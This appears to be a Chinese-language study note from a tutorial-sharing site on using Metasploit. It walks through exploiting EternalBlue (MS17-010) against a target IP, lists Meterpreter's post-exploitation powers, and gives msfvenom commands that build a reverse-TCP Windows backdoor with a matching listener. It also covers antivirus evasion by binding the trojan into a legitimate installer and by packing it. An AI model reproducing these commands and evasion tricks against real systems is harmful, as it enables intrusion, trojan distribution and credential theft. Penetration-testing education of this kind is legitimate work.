msf
MSF——基本使用和Exploit模块(一) – 走看看 (zoukankan.com)
1、介绍
matasploit,简称msf,是一款开源安全漏洞利用和测试工具,集成了 各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。
msfconsole
2、永恒之蓝
永恒之蓝 2017年4月4日 黑客团体Brokeers影子经纪人 网络攻击工具
利用windows系统的smb漏洞可以获取系统最高权限
5月12日 出现基于此的wanacry勒索病毒
3、使用模块
有上千个模块,搜索语法
search ms17_010
//exploit 攻击脚本
//auxiliary 辅助脚本,测试漏洞是否存在
use 编号
use 全称
//查看设置
show options或者options
# 设置参数
set RHOSTS 192.168.2.129
# payload option攻击载荷,指的是目标的操作系统,主要是32和64,最新版msf是默认64
# LHOST 监听地址,即运行msf的主机
# LPORT msf使用端口
# set lport 60000
# 攻击
run
# meterpreter标识,标识攻击成功
MSDN, 我告诉你 – 做一个安静的工具站 (itellyou.cn),一个windows的镜像资源站点,其中的操作系统是原生纯净的,没有任何补丁。
4、后门
meterpreter是强大的后渗透模块
help //在meterpreter标识输入,获取帮助信息
远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统
msfvenom是用来生成后门的软件,在目标上执行后门,在本地监听上线。
msfvenom在shell里使用,不是msfconsole终端
病毒分为破坏性的和共存性的
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe
- -p payload
- 系统/架构/作用/方式
- 本地ip和本地端口,是自主设置的
- -f format
- 作用之后生成文件
一般会被防火墙过滤,需要免杀
5、
use exploit/multi/handler
//三个必须的设置,需要与生成的木马一致的设置
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.136
set lport 9999
run
用户双击exe运行之后,攻击者就会收到。
6、权限维持和二次
7、免杀
捆绑木马:下载正常程序,然后捆绑,当用户收到软件执行后会触发。
(可以绕过火绒,但无法绕过对文件校验的360.且需要注意国内程序默认一般是32,无法植入64位的木马)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -x notepadd++.exe -o demo.exe
加壳:本身是保护软件不被反编译,不被抄袭。分为压缩壳、加密壳
通过加壳软件使用,比如themida